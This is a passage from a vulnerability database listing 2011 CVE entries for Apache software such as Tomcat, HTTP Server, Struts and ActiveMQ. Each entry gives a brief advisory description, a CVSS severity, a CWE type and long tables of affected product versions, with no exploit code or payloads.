Vendor Product Version
apache wicket 1.4.10
apache wicket 1.4.2
apache wicket 1.4.15
apache wicket 1.4.16
apache wicket 1.4.6
apache wicket 1.4.9
apache wicket 1.4.5
apache wicket 1.4.12
apache wicket 1.4.0
apache wicket 1.4.8
apache wicket 1.4.14
apache wicket 1.4.1
apache wicket 1.4.3
apache wicket 1.4.17
apache wicket 1.4.4
apache wicket 1.4.13
apache wicket 1.4.11
apache wicket 1.4.7
CVE-2011-2729 MEDIUM

native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 5.5.33
apache apache_commons_daemon 1.0.6
apache tomcat 7.0.13
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.7
apache tomcat 7.0.12
apache apache_commons_daemon 1.0.3
apache tomcat 6.0.31
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache apache_commons_daemon 1.0.4
apache tomcat 7.0.8
apache tomcat 7.0.17
apache apache_commons_daemon 1.0.5
apache tomcat 7.0.2
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.0
CVE-2011-2767 HIGH

mod_perl 2.0 through 2.0.10 allows attackers to execute arbitrary Perl code by placing it in a user-owned .htaccess file, because (contrary to the documentation) there is no configuration option that permits Perl code for the administrator's control of HTTP request processing without also permitting unprivileged users to run Perl code in the context of the user account that runs Apache HTTP Server processes.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.10
redhat enterprise_linux 6.7
canonical ubuntu_linux 18.04
apache mod_perl *
redhat enterprise_linux_desktop 6.0
debian debian_linux 8.0
redhat enterprise_linux 7.3
redhat enterprise_linux 6.0
redhat enterprise_linux 7.0
redhat enterprise_linux 7.5
canonical ubuntu_linux 12.04
canonical ubuntu_linux 16.04
redhat enterprise_linux 7.4
redhat enterprise_linux_server 6.0
canonical ubuntu_linux 14.04
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux 7.6
CVE-2011-3190 HIGH

Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 7.0.13
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.33
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2011-3192 HIGH

The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache http_server *
suse linux_enterprise_server 10
suse linux_enterprise_server 11
canonical ubuntu_linux 8.04
opensuse opensuse 11.4
opensuse opensuse 11.3
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
suse linux_enterprise_software_development_kit 11
canonical ubuntu_linux 11.04
suse linux_enterprise_software_development_kit 10
CVE-2011-3348 MEDIUM

The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache http_server *
redhat jboss_enterprise_web_server 1.0.0
CVE-2011-3368 MEDIUM

The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache http_server 2.2.19
apache http_server 2.2.1
apache http_server 1.3.14
apache http_server 1.3.34
apache http_server 2.2.0
apache http_server 2.2.16
apache http_server 2.0.44
apache http_server 1.3.27
apache http_server 2.2.12
apache http_server 2.0.47
apache http_server 1.3.24
apache http_server 1.3.9
apache http_server 2.0.40
apache http_server 1.3.68
apache http_server 1.3.1.1
apache http_server 2.2.13
apache http_server 1.3.65
apache http_server 2.0.35
apache http_server 2.2.8
apache http_server 1.3.2
apache http_server 1.3.0
apache http_server 2.0.45
apache http_server 1.3.18
apache http_server 2.0.51
apache http_server 1.3.38
apache http_server 2.0.37
apache http_server 2.2.10
apache http_server 1.3.33
apache http_server 2.0
apache http_server 2.2.2
apache http_server 2.2.14
apache http_server 2.2.20
apache http_server 1.3.39
apache http_server 2.0.53
apache http_server 2.2.6
apache http_server 2.0.43
apache http_server 1.3.25
apache http_server 2.0.38
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 2.0.57
apache http_server 2.2.18
apache http_server 1.3.6
apache http_server 1.3.32
apache http_server 1.3.28
apache http_server 1.3.13
apache http_server 2.0.50
apache http_server 2.0.56
apache http_server 2.0.28
apache http_server 1.3.42
apache http_server 1.3.19
apache http_server 1.3.5
apache http_server 2.0.61
apache http_server 1.3.4
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.0.36
apache http_server 1.3.10
apache http_server 1.3.29
apache http_server 1.3.16
apache http_server 1.3.36
apache http_server 1.3.23
apache http_server 1.3.31
apache http_server 2.0.32
apache http_server 1.3.30
apache http_server 1.3.1
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.0.46
apache http_server 1.3.7
apache http_server 1.3.12
apache http_server 2.0.59
apache http_server 1.3.41
apache http_server 1.3.20
apache http_server 2.2.3
apache http_server 2.0.52
apache http_server 2.0.39
apache http_server 2.0.64
apache http_server 2.2.9
apache http_server 1.3.22
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.0.58
apache http_server 1.3.15
apache http_server 2.0.42
apache http_server 1.3.11
apache http_server 2.0.55
apache http_server 1.3.35
apache http_server 2.0.63
apache http_server 1.3
apache http_server 2.0.60
apache http_server 1.3.37
apache http_server 1.3.8
apache http_server 2.0.54
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.0.34
apache http_server 1.3.3
CVE-2011-3375 MEDIUM

Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 7.0.13
apache tomcat 6.0.33
apache tomcat 7.0.15
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 7.0.12
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 7.0.21
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.8
apache tomcat 7.0.17
apache tomcat 7.0.2
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.0
CVE-2011-3376 MEDIUM

org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 7.0.14
apache tomcat 7.0.21
apache tomcat 7.0.1
apache tomcat 7.0.13
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.15
apache tomcat 7.0.3
apache tomcat 7.0.8
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.17
apache tomcat 7.0.18
apache tomcat 7.0.2
apache tomcat 7.0.7
apache tomcat 7.0.12
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.20
CVE-2011-3600 MEDIUM

The /webtools/control/xmlrpc endpoint in OFBiz XML-RPC event handler is exposed to External Entity Injection by passing DOCTYPE declarations with executable payloads that discloses the contents of files in the filesystem. In addition, it can also be used to probe for open network ports, and figure out from returned error messages whether a file exists or not. This affects OFBiz 16.11.01 to 16.11.04.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2011-3607 MEDIUM

Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
apache http_server 2.0.61
apache http_server 2.2.19
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.0.36
apache http_server 2.2.1
apache http_server 2.2.0
apache http_server 2.2.16
apache http_server 2.0.44
apache http_server 2.2.12
apache http_server 2.0.47
apache http_server 2.0.32
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.2.13
apache http_server 2.0.35
apache http_server 2.2.8
apache http_server 2.0.46
apache http_server 2.0.59
apache http_server 2.0.45
apache http_server 2.2.3
apache http_server 2.0.51
apache http_server 2.0.37
apache http_server 2.2.10
apache http_server 2.0.52
apache http_server 2.0.39
apache http_server 2.0.64
apache http_server 2.0
apache http_server 2.2.2
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.0.9
apache http_server 2.2.20
apache http_server 2.0.41
apache http_server 2.0.58
apache http_server 2.0.53
apache http_server 2.2.6
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.55
apache http_server 2.0.38
apache http_server 2.0.63
apache http_server 2.0.57
apache http_server 2.2.18
apache http_server 2.0.60
apache http_server 2.0.54
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.0.50
apache http_server 2.0.56
apache http_server 2.0.34
apache http_server 2.0.28
CVE-2011-3620 HIGH

Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache qpid 0.12
CVE-2011-3639 MEDIUM

The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache http_server2.0a7 *
apache http_server 2.0.17
apache http_server 2.0.33
apache http_server2.0a4 *
apache http_server 2.0.14
apache http_server 2.0.31
apache http_server 2.0.61
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.0.36
apache http_server 2.2.1
apache http_server 2.0.16
apache http_server 2.0.20
apache http_server2.0a5 *
apache http_server 2.0.30
apache http_server 2.2.0
apache http_server 2.0.21
apache http_server 2.0.24
apache http_server 2.2.16
apache http_server 2.0.44
apache http_server 2.2.12
apache http_server 2.0.47
apache http_server 2.0.32
apache http_server2.0a8 *
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.2.13
apache http_server 2.0.19
apache http_server 2.0.35
apache http_server 2.2.8
apache http_server 2.0.46
apache http_server 2.0.11
apache http_server 2.0.59
apache http_server 2.0.27
apache http_server 2.0.45
apache http_server 2.2.3
apache http_server 2.0.29
apache http_server 2.0.51
apache http_server 2.0.37
apache http_server 2.0.26
apache http_server 2.2.10
apache http_server 2.0.15
apache http_server2.0a2 *
apache http_server 2.0.52
apache http_server 2.0.39
apache http_server 2.2.17
apache http_server2.0a3 *
apache http_server 2.2.2
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.0.18
apache http_server 2.0.41
apache http_server 2.0.58
apache http_server2.0a1 *
apache http_server2.0a6 *
apache http_server 2.0.13
apache http_server 2.0.12
apache http_server 2.0.53
apache http_server 2.2.6
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.55
apache http_server 2.0.38
apache http_server 2.0.25
apache http_server2.0a9 *
apache http_server 2.0.63
apache http_server 2.0.57
apache http_server 2.0.23
apache http_server 2.0.22
apache http_server 2.0.54
apache http_server 2.2.15
apache http_server 2.0.50
apache http_server 2.0.56
apache http_server 2.0.34
apache http_server 2.0.28
CVE-2011-3923 HIGH

Apache Struts before 2.3.1.2 allows remote attackers to bypass security protections in the ParameterInterceptor class and execute arbitrary commands.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-732,

Products Affected

Vendor Product Version
apache struts *
redhat jboss_enterprise_web_server 1.0.0
CVE-2011-4317 MEDIUM

The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache http_server 2.2.19
apache http_server 2.2.1
apache http_server 1.3.14
apache http_server 1.3.34
apache http_server 2.2.0
apache http_server 2.2.16
apache http_server 2.0.44
apache http_server 1.3.27
apache http_server 2.2.12
apache http_server 2.0.47
apache http_server 1.3.24
apache http_server 1.3.9
apache http_server 2.0.40
apache http_server 1.3.68
apache http_server 1.3.1.1
apache http_server 2.2.13
apache http_server 1.3.65
apache http_server 2.0.35
apache http_server 2.2.8
apache http_server 1.3.2
apache http_server 1.3.0
apache http_server 2.0.45
apache http_server 1.3.18
apache http_server 2.0.51
apache http_server 1.3.38
apache http_server 2.0.37
apache http_server 2.2.10
apache http_server 1.3.33
apache http_server 2.0
apache http_server 2.2.2
apache http_server 2.2.14
apache http_server 2.2.20
apache http_server 1.3.39
apache http_server 2.0.53
apache http_server 2.2.6
apache http_server 2.0.43
apache http_server 1.3.25
apache http_server 2.0.38
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 2.0.57
apache http_server 2.2.18
apache http_server 1.3.6
apache http_server 1.3.32
apache http_server 1.3.28
apache http_server 1.3.13
apache http_server 2.0.50
apache http_server 2.0.56
apache http_server 2.0.28
apache http_server 1.3.42
apache http_server 1.3.19
apache http_server 1.3.5
apache http_server 2.0.61
apache http_server 1.3.4
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.0.36
apache http_server 1.3.10
apache http_server 1.3.29
apache http_server 1.3.16
apache http_server 1.3.36
apache http_server 1.3.23
apache http_server 1.3.31
apache http_server 2.0.32
apache http_server 1.3.30
apache http_server 1.3.1
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.0.46
apache http_server 1.3.7
apache http_server 1.3.12
apache http_server 2.0.59
apache http_server 1.3.41
apache http_server 1.3.20
apache http_server 2.2.3
apache http_server 2.0.52
apache http_server 2.0.39
apache http_server 2.0.64
apache http_server 2.2.9
apache http_server 1.3.22
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.0.58
apache http_server 1.3.15
apache http_server 2.0.42
apache http_server 1.3.11
apache http_server 2.0.55
apache http_server 1.3.35
apache http_server 2.0.63
apache http_server 1.3
apache http_server 2.0.60
apache http_server 1.3.37
apache http_server 1.3.8
apache http_server 2.0.54
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.0.34
apache http_server 1.3.3
CVE-2011-4343 MEDIUM

Information disclosure vulnerability in Apache MyFaces Core 2.0.1 through 2.0.10 and 2.1.0 through 2.1.4 allows remote attackers to inject EL expressions via crafted parameters.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache myfaces 2.0.6
apache myfaces 2.0.9
apache myfaces 2.0.2
apache myfaces 2.0.5
apache myfaces 2.0.3
apache myfaces 2.1.1
apache myfaces 2.1.0
apache myfaces 2.1.3
apache myfaces 2.0.8
apache myfaces 2.0.7
apache myfaces 2.0.10
apache myfaces 2.1.4
apache myfaces 2.1.2
apache myfaces 2.0.1
apache myfaces 2.0.4
CVE-2011-4415 LOW

The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.

CVSS 2.0

Severity: LOW

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache http_server 2.0.61
apache http_server 2.2.19
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.0.36
apache http_server 2.2.1
apache http_server 2.2.0
apache http_server 2.2.16
apache http_server 2.0.44
apache http_server 2.2.12
apache http_server 2.0.47
apache http_server 2.0.32
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.2.13
apache http_server 2.0.35
apache http_server 2.2.8
apache http_server 2.0.46
apache http_server 2.0.59
apache http_server 2.0.45
apache http_server 2.2.3
apache http_server 2.0.51
apache http_server 2.0.37
apache http_server 2.2.10
apache http_server 2.0.52
apache http_server 2.0.39
apache http_server 2.0.64
apache http_server 2.0
apache http_server 2.2.2
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.0.9
apache http_server 2.2.20
apache http_server 2.0.41
apache http_server 2.0.58
apache http_server 2.0.53
apache http_server 2.2.6
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.55
apache http_server 2.0.38
apache http_server 2.0.63
apache http_server 2.0.57
apache http_server 2.2.18
apache http_server 2.0.60
apache http_server 2.0.54
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.0.50
apache http_server 2.0.56
apache http_server 2.0.34
apache http_server 2.0.28
CVE-2011-4858 MEDIUM

Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache tomcat 7.0.13
apache tomcat 6.0.7
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 7.0.21
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 5.5.35
apache tomcat 6.0.22
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.23
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 6.0.33
apache tomcat 7.0.15
apache tomcat 6.0.25
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.34
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.21
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2011-4905 MEDIUM

Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 3.1
apache activemq 5.4.0
apache activemq 5.4.3
apache activemq 3.2
apache activemq 5.1.0
apache activemq 4.0.2
apache activemq 5.3.0
apache activemq 1.5
apache activemq 4.0.1
apache activemq 5.0.0
apache activemq 3.2.2
apache activemq 2.0
apache activemq 5.4.1
apache activemq 4.1.1
apache activemq 4.1.0
apache activemq *
apache activemq 4.1.2
apache activemq 1.1
apache activemq 5.5.0
apache activemq 1.2
apache activemq 5.3.2
apache activemq 3.0
apache activemq 4.0
apache activemq 1.3
apache activemq 3.2.1
apache activemq 5.2.0
apache activemq 2.1
apache activemq 1.4
CVE-2011-5034 HIGH

Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache geronimo 1.2
apache geronimo 1.1
apache geronimo 2.2
apache geronimo 2.1.6
apache geronimo 1.0
apache geronimo 2.1.8
apache geronimo *
apache geronimo 2.1.7
apache geronimo 2.1.2
apache geronimo 2.1.5
apache geronimo 2.0.2
apache geronimo 2.0.1
apache geronimo 2.1.3
apache geronimo 2.1.4
apache geronimo 1.1.1
apache geronimo 2.1
apache geronimo 2.1.1
CVE-2011-5057 MEDIUM

Apache Struts 2.3.1.2 and earlier, 2.3.19-2.3.23, provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache struts *
CVE-2011-5062 MEDIUM

The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2011-5063 MEDIUM

The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
